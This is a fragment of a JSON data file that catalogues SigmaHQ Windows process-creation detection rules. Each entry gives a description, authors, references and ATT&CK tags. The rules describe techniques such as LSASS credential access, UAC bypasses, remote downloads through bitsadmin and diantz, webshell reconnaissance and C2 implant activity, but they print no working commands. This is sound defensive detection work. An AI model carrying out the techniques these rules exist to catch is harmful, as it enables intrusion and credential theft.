"author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation" + }, + { + "description": "Detects WannaCry ransomware activity", + "meta": { + "author": "Florian Roth (rule), Tom 
U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_wannacry.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ] + }, + "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", + "value": "WannaCry Ransomware" + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2018/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_office_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product Spawning Windows Shell" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "creation_date": "2018/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "value": "Suspicious XOR Encoded PowerShell Command Line" + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hack_sharpersist.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + 
"https://github.com/mandiant/SharPersist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053" + ] + }, + "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage" + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification" + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/20", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "filename": "proc_creation_win_hack_bloodhound.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/BloodHoundAD/BloodHound", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool" + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/25", + "falsepositive": [ + "Legitimate software creating script event consumers" + ], + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" + }, + { + "description": "Detects WMI script event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "value": "WMI Persistence - Script Event Consumer" + }, + { + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_c2_sliver.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "42333b2c-b425-441c-b70e-99404a17170f", + "value": "Sliver C2 Implant Activity Pattern" + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": 
"bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection" + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "creation_date": "2021/05/20", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM" + }, + { + "description": "Detects inline execution of PowerShell code from a file", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ps_exec_data_file.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_exec_data_file.yml" + ], + "tags": "No established tags" + }, + "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "value": "Powershell Inline Execution From A File" + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "meta": { + "author": "David Burkett, @signalblur", + "creation_date": "2019/12/28", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "filename": "proc_creation_win_susp_svchost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity" + }, + { + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "meta": { + "author": "Alfie Champion (ajpc500)", + "creation_date": "2021/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_c3_load_by_rundll32.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "value": "F-Secure C3 Load by Rundll32" + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2020/06/11", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "filename": "proc_creation_win_commandline_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal" + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner" + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sigverif.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution" + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "meta": { + "author": "Romaissa Adjailia, FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": 
"fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution" + }, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File" + }, + { + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Some legitimate apps use this, but limited." 
+ ], + "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/diary/22264", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "value": "Bitsadmin Download from Suspicious Domain" + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "filename": "proc_creation_win_lolbin_adplus.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ] + }, + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe" + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "meta": { + "author": "Florian Roth, Nasreddine 
Bencherchali @nas_bench", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM" + }, + { + "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", + "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_cloudhopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ] + }, + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script" + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS" + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "meta": { + 
"author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN" + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile" + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "filename": "proc_creation_win_susp_pcwutl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + 
"https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll" + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "creation_date": "2017/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords" + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conhost_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], + "tags": [ + 
"attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal" + }, + { + "description": "Detects renamed jusched.exe used by cobalt group", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2019/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_jusched.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "value": "Renamed jusched.exe" + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_takeown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": 
"554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown" + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": 